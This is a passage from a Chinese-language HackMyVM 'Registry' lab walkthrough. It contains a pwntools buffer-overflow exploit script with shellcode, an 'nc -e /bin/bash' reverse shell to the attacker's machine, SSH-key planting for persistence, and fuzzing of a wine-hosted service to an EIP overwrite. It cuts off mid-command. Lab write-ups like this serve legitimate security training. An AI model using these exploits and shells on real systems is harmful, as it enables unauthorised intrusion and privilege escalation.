src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422180857587\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158497.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158497.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422180922722\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u770b\u51fa<code>buffer<\/code>\u5927\u5c0f\u5927\u6982\u4e3a<code>0x80<\/code>\uff0c\u4e5f\u5c31\u662f<code>128<\/code>\uff0c\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ gdb-pwndbg -q program\nReading symbols from program...\n(No debugging symbols found in program)\npwndbg: loaded 156 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.\npwndbg: created $rebase, $base, $ida GDB functions (can be used with print\/break)\n------- tip of the day (disable with set show-tips off) -------\nheap_config shows heap related configuration\npwndbg&gt; cyclic 200\naaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa\npwndbg&gt; run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa\nStarting program: \/home\/kali\/temp\/Registry\/program aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa\n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library &quot;\/lib\/x86_64-linux-gnu\/libthread_db.so.1&quot;.\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x00000000004011d9 in vuln ()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158498.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158498.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422172703589\" \/><\/div><\/p>\n<h4>\u67e5\u770b\u504f\u79fb\u91cf<\/h4>\n<pre><code class=\"language-bash\">pwndbg&gt; cyclic -l 0x6161616161616172\nFinding cyclic pattern of 8 bytes: b&#039;raaaaaaa&#039; (hex: 0x7261616161616161)\nFound at offset 136<\/code><\/pre>\n<h4>jmp\u5730\u5740<\/h4>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ ropper --file program --jmp rax \nJMP Instructions\n================\n0x0000000000401014: call rax; \n0x00000000004010cc: jmp rax; \n0x000000000040110e: jmp rax; \n3 gadgets found<\/code><\/pre>\n<h4>\u7f16\u5199\u811a\u672c<\/h4>\n<p>\u548c<a href=\"https:\/\/xchg2pwn.github.io\/hackmyvm\/registry\/\">\u4f5c\u8005wp<\/a>\u4e2d\u7684\u56fe\u57fa\u672c\u4e0a\u4e00\u6837\uff0c\u6211\u753b\u4e86\u4e2a\u52a0\u6df1\u7406\u89e3\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158499.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158499.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422183418525\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8f93\u5165\u5206\u4e3a\u4e09\u90e8\u5206<code>shellcode<\/code>\uff0c<code>junk<\/code>\u4ee5\u53ca<code>callrax<\/code>\u7684<code>RIP<\/code>\u5730\u5740\uff0c\u8fd9\u6837<code>callrax<\/code>\u7684\u65f6\u5019\u5c31\u4f1a\u8c03\u7528\u6211\u4eec\u7684shell\u4e86\uff01<\/p>\n<p>\u9776\u673a\u7cfb\u7edf\u81ea\u5e26\u4e86<code>peda<\/code>\u548c<code>pwntools<\/code>\uff0c\u8fd9\u6b21\u4e0d\u7528\u8fdb\u884csocat\u4ee3\u7406\u518d\u6253\u4e86\uff01<\/p>\n<pre><code class=\"language-python\">#!\/usr\/bin\/python3\nfrom pwn import *\n\noffset = 136\n# This module contains functions for generating shellcode.\nshellcode = b&quot;&quot;\nshellcode += asm(shellcraft.amd64.setresuid(1002, 1002), arch=&quot;amd64&quot;)\nshellcode += asm(shellcraft.amd64.sh(), arch = &quot;amd64&quot;)\n\njunk = b&quot;A&quot; * (offset - len(shellcode))\ncallrax = p32(0x401014)\n\npayload = shellcode + junk + callrax    \nshell = process([&quot;\/opt\/others\/program&quot;, payload])\nshell.interactive()<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158500.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158500.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240422192540842\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743gato<\/h3>\n<h4>\u4fe1\u606f\u641c\u96c6\u4e0e\u6d4b\u8bd5<\/h4>\n<p>\u91cd\u65b0\u6539\u5584\u4e00\u4e0b\u73af\u5883\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@registry:\/tmp$ python3 exp.py \n[+] Starting local process &#039;\/opt\/others\/program&#039;: pid 1980\n[*] Switching to interactive mode\n$ nc -e \/bin\/bash 192.168.0.143 2345\nstty: &#039;standard input&#039;: Inappropriate ioctl for device<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ sudo pwncat-cs -lp 2345 2&gt;\/dev\/null \n[sudo] password for kali: \n[07:23:14] Welcome to pwncat \ud83d\udc08!                                                                                               \n(remote) cxdxnt@registry:\/tmp$ whoami;id\ncxdxnt\nuid=1002(cxdxnt) gid=33(www-data) groups=33(www-data)\n(remote) cxdxnt@registry:\/tmp$ cd \/home\/cxdxnt\/\n(remote) cxdxnt@registry:\/home\/cxdxnt$ ls -la\ntotal 28\ndrwxr-x--- 3 cxdxnt cxdxnt 4096 Jul 24  2023 .\ndrwxr-xr-x 5 root   root   4096 Jul 24  2023 ..\nlrwxrwxrwx 1 root   root      9 Jul 24  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 cxdxnt cxdxnt  220 Jan  6  2022 .bash_logout\n-rw-r--r-- 1 cxdxnt cxdxnt 3771 Jan  6  2022 .bashrc\ndrwx------ 2 cxdxnt cxdxnt 4096 Jul 24  2023 .cache\n-rw-r--r-- 1 cxdxnt cxdxnt  807 Jan  6  2022 .profile\n-rw-rw-r-- 1 cxdxnt cxdxnt   36 Jul 24  2023 user.txt\n(remote) cxdxnt@registry:\/home\/cxdxnt$ sudo -l        \nMatching Defaults entries for cxdxnt on registry:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser cxdxnt may run the following commands on registry:\n    (gato : gato) NOPASSWD: \/usr\/bin\/wine \/opt\/projects\/MyFirstProgram.exe\n(remote) cxdxnt@registry:\/home\/cxdxnt$ cat user.txt \nREGISTRY{4R3_Y0U_R34D1N6_MY_F1L35?}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fd0\u884c\u4e00\u4e0b\u8fd9\u4e2a\u7a0b\u5e8f\uff0c\u770b\u770b\u6709\u5565\u53d8\u5316\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) cxdxnt@registry:\/tmp$ sudo -u gato \/usr\/bin\/wine \/opt\/projects\/MyFirstProgram.exe\n0090:err:explorer:initialize_display_settings Failed to query current display settings for L&quot;\\\\\\\\.\\\\DISPLAY1&quot;.\n[+] Listening for connections.<\/code><\/pre>\n<p>\u8fd9\u6837\u5c31\u52a8\u4e0d\u4e86\u4e86\uff0c\u7ec8\u6b62\u7a0b\u5e8f\uff0c\u4e0a\u4f20\u4e00\u4e2a\u516c\u94a5\uff0c\u767b\u5f55\u591a\u4e2a\u7ec8\u7aef\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Registry\/cxdxnt\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Registry\/cxdxnt\nYour public key has been saved in \/home\/kali\/temp\/Registry\/cxdxnt.pub\nThe key fingerprint is:\nSHA256:HPtUvkirzMWBITibhTEV4feC3U5fc8gwi7Y\/IMUiHao kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|    o.+o         |\n|     *  .        |\n|    + +o+o  +    |\n|     =o*oBo+ = . |\n|    o...SoX o = .|\n|    E   .X.* o o |\n|         .O.o    |\n|       o o ..    |\n|        +   ..   |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ cat cxdxnt.pub            \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCMAkdE5Kc3DxyXRxBPU11aatMs8JR1P3uJ6nOlw0PaNjb5+2GU8tCB1sxh\/4e4Se3WY8cvK6qldrQ3wrsskBHs6N+izIPYMKXNtjOp3g0ulcsSW5LP5Urqi4DmEDBouA542RH9Uz4u3qett\/F1x41HV5wOcXR1ciJ9NvjrZwRyiZNVStHQ1m4imztzx+OHi7ok+5mqgTjerjHOrEgIi08AQXygQOy++zkGeyNnAwkczYPsWy89DpqzCsvYSUoYvhjceciUuNWL9v\/b8IWq+Jj7TnCJfEOYzsKNFdzWQAb4BptdhLZBp66\/mn4U6rqpkCUmHw\/x9xaIy0MMU4evWii\/UjNuNN1JTUrXGfGZ+xXjk5JDnhyxTcp1lG+UyIi4hqv6jQzGyp6msoCHfhcMpw465Dv3WGBrj8zSEaefIqIrTlFc9cAudakvbTlvLshiBkMnpcg91\/TIxGSZ0j0ckUaqwfrh0H1Cad52jAO2BK1+Tdn5j1PAjwNRk7Txu48FBIU= kali@kali\n\n(remote) cxdxnt@registry:\/home\/cxdxnt$ mkdir .ssh\n(remote) cxdxnt@registry:\/home\/cxdxnt$ cd .ssh\n(remote) cxdxnt@registry:\/home\/cxdxnt\/.ssh$ echo &#039;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCMAkdE5Kc3DxyXRxBPU11aatMs8JR1P3uJ6nOlw0PaNjb5+2GU8tCB1sxh\/4e4Se3WY8cvK6qldrQ3wrsskBHs6N+izIPYMKXNtjOp3g0ulcsSW5LP5Urqi4DmEDBouA542RH9Uz4u3qett\/F1x41HV5wOcXR1ciJ9NvjrZwRyiZNVStHQ1m4imztzx+OHi7ok+5mqgTjerjHOrEgIi08AQXygQOy++zkGeyNnAwkczYPsWy89DpqzCsvYSUoYvhjceciUuNWL9v\/b8IWq+Jj7TnCJfEOYzsKNFdzWQAb4BptdhLZBp66\/mn4U6rqpkCUmHw\/x9xaIy0MMU4evWii\/UjNuNN1JTUrXGfGZ+xXjk5JDnhyxTcp1lG+UyIi4hqv6jQzGyp6msoCHfhcMpw465Dv3WGBrj8zSEaefIqIrTlFc9cAudakvbTlvLshiBkMnpcg91\/TIxGSZ0j0ckUaqwfrh0H1Cad52jAO2BK1+Tdn5j1PAjwNRk7Txu48FBIU= kali@kali&#039; &gt; authorized_keys<\/code><\/pre>\n<p>\u7136\u540e\u5c1d\u8bd5ssh\u8fde\u63a5\uff0c\u53d1\u73b0\u662f\u6b63\u5e38\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ chmod 600 cxdxnt     \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ ssh -i cxdxnt cxdxnt@192.168.0.115\nThe authenticity of host &#039;192.168.0.115 (192.168.0.115)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:qVm+t\/pt+frW8U73aQ2IFTgQXqNWLdYL9gIsVXVMtQM.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.115&#039; (ED25519) to the list of known hosts.\nWelcome to Ubuntu 22.04.2 LTS (GNU\/Linux 5.15.0-76-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\nThis system has been minimized by removing packages and content that are\nnot required on a system that users do not log into.\n\nTo restore this content, you can run the &#039;unminimize&#039; command.\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\n\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u255a\u2588\u2588\u2557 \u2588\u2588\u2554\u255d\n\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551  \u2588\u2588\u2557 \u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2557    \u2588\u2588\u2551   \u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u255a\u2588\u2588\u2588\u2588\u2554\u255d\n\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u255d  \u2588\u2588\u2551  \u255a\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2550\u2550\u2550\u2588\u2588\u2557   \u2588\u2588\u2551   \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557  \u255a\u2588\u2588\u2554\u255d\n\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d   \u2588\u2588\u2551   \u2588\u2588\u2551  \u2588\u2588\u2551   \u2588\u2588\u2551\n\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d    \u255a\u2550\u255d   \u255a\u2550\u255d  \u255a\u2550\u255d   \u255a\u2550\u255d\n\nLast login: Mon Jul 24 05:55:51 2023 from 192.168.100.85\ncxdxnt@registry:~$ <\/code><\/pre>\n<p>\u8fd0\u884csudo\u7a0b\u5e8f\uff0c\u770b\u770b\u54ea\u91cc\u6709\u4e0d\u540c\uff1a<\/p>\n<pre><code class=\"language-bash\">cxdxnt@registry:~$ ss -tnlup\nNetid        State         Recv-Q        Send-Q                        Local Address:Port                  Peer Address:Port        Process        \nudp          UNCONN        0             0                             127.0.0.53%lo:53                         0.0.0.0:*                          \nudp          UNCONN        0             0                      192.168.0.115%enp0s3:68                         0.0.0.0:*                          \ntcp          LISTEN        0             4096                          127.0.0.53%lo:53                         0.0.0.0:*                          \ntcp          LISTEN        0             128                                 0.0.0.0:22                         0.0.0.0:*                          \ntcp          LISTEN        0             4096                                0.0.0.0:42424                      0.0.0.0:*                          \ntcp          LISTEN        0             128                                    [::]:22                            [::]:*                          \ntcp          LISTEN        0             511                                       *:80                               *:*                          <\/code><\/pre>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86<code>42424<\/code>\u7aef\u53e3\uff0c\u5728\u7ec8\u7aef\u8fdb\u884c\u8fde\u63a5\u4e00\u4e0b\uff0c\u770b\u770b\u5565\u60c5\u51b5\uff0c\u5c1d\u8bd5\u53d1\u9001\u6570\u636e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ nc 192.168.0.115 42424            \nwhoami;id\nERROR whoami;id...\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<\/code><\/pre>\n<p>\u4f1a\u81ea\u52a8\u5f39\u51fa\uff0c\u770b\u4e00\u4e0b\u54cd\u5e94\uff0c\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">cxdxnt@registry:~$ sudo -u gato \/usr\/bin\/wine \/opt\/projects\/MyFirstProgram.exe\n0044:err:explorer:initialize_display_settings Failed to query current display settings for L&quot;\\\\\\\\.\\\\DISPLAY1&quot;.\n0044:err:ole:start_rpcss Failed to open service manager\n[+] Listening for connections.\nReceived connection from remote host.\nConnection handed off to handler thread.\nBytes received: 10\nBytes sent: 19\nBytes received: 1221\nsend failed: 10038\nwine: Unhandled page fault on read access to 61616161 at address 61616161 (thread 00d0), starting debugger...\n00d8:err:winediag:nodrv_CreateWindow Application tried to create a window, but no driver could be loaded.\n00d8:err:winediag:nodrv_CreateWindow Make sure that your X server is running and that $DISPLAY is set correctly.\nUnhandled exception: page fault on read access to 0x61616161 in 32-bit code (0x61616161).\nRegister dump:\n CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063\n EIP:61616161 ESP:008d19a4 EBP:61616161 EFLAGS:00010286(  R- --  I S - -P- )\n EAX:ffffffff EBX:00114200 ECX:008d1904 EDX:3ffd2000\n ESI:006b04d8 EDI:00000000\nStack dump:\n0x008d19a4:  61616161 61616161 61616161 61616161\n0x008d19b4:  61616161 61616161 61616161 61616161\n0x008d19c4:  61616161 61616161 61616161 61616161\n0x008d19d4:  61616161 61616161 61616161 61616161\n0x008d19e4:  61616161 61616161 61616161 61616161\n0x008d19f4:  61616161 61616161 61616161 61616161\nBacktrace:\n=&gt;0 0x61616161 (0x61616161)\n0x61616161: -- no code accessible --\nModules:\nModule  Address                 Debug info      Name (12 modules)\nPE       8040000- 8048000       Deferred        myfirstprogram\nPE      61f80000-61f90000       Deferred        api-ms-win-crt-math-l1-1-0\nPE      63740000-6374e000       Deferred        api-ms-win-crt-runtime-l1-1-0\nPE      66600000-6660d000       Deferred        api-ms-win-crt-locale-l1-1-0\nPE      6b7c0000-6b7ce000       Deferred        api-ms-win-crt-stdio-l1-1-0\nPE      6ca00000-6ca0d000       Deferred        api-ms-win-crt-heap-l1-1-0\nPE      70240000-70256000       Deferred        vcruntime140\nPE      70b40000-70df9000       Deferred        ucrtbase\nPE      7b000000-7b348000       Deferred        kernelbase\nPE      7b600000-7b929000       Deferred        kernel32\nPE      7bc00000-7bea9000       Deferred        ntdll\nPE      7fdd0000-7fdd6000       Deferred        ws2_32\nThreads:\nprocess  tid      prio (all id:s are in hex)\n00000020 (D) Z:\\opt\\projects\\MyFirstProgram.exe\n        00000024    0\n        000000d0    0 &lt;==\n        000000dc    0\n00000038 services.exe\n        0000003c    0\n        0000004c    0\n        00000058    0\n        00000078    0\n        00000090    0\n        0000009c    0\n        000000bc    0\n00000040 explorer.exe\n        00000044    0\n        00000048    0\n00000050 winedevice.exe\n        00000054    0\n        00000060    0\n        00000064    0\n        00000068    0\n00000070 plugplay.exe\n        00000074    0\n        0000007c    0\n        00000080    0\n        00000084    0\n        000000a4    0\n00000088 winedevice.exe\n        0000008c    0\n        00000094    0\n        00000098    0\n        000000a0    0\n        000000b0    0\n000000b4 svchost.exe\n        000000b8    0\n        000000c0    0\n        000000c4    0\n000000c8 conhost.exe\n        000000cc    0\nSystem information:\n    Wine build: wine-6.0.3 (Ubuntu 6.0.3~repack-1)\n    Platform: i386\n    Version: Windows 7\n    Host system: Linux\n    Host version: 5.15.0-76-generic<\/code><\/pre>\n<p>\u5e94\u8be5\u662f\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\u7684\uff0c\u9274\u4e8e\u8be5\u7a0b\u5e8f\u5c5e\u4e8e<code>wine<\/code>\u8fd0\u884c\uff0c\u6240\u4ee5\u628a\u590d\u5236\u5230\u672c\u673a\u8fdb\u884cdbg\u3002<\/p>\n<pre><code class=\"language-bash\">hgbe02@pwn:\/mnt\/c\/Users\/Administrator\/Desktop$ file MyFirstProgram.exe\nMyFirstProgram.exe: PE32 executable (console) Intel 80386, for MS Windows<\/code><\/pre>\n<p>\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u884c\u8c03\u8bd5\uff0c\u5148\u770b\u4e00\u4e0b\u662f\u5426\u52a0\u58f3\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158501.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407060158501.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240705204649217\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h4>\u6d4b\u8bd5\u504f\u79fb\u5b57\u7b26<\/h4>\n<p>\u5148\u751f\u6210\u51e0\u4e2a\u5b57\u7b26\u6d4b\u4e00\u4e0b\u504f\u79fb\u91cf\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ locate pattern_create\n\/usr\/bin\/msf-pattern_create\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Registry]\n\u2514\u2500$ \/usr\/bin\/msf-pattern_create -l 200 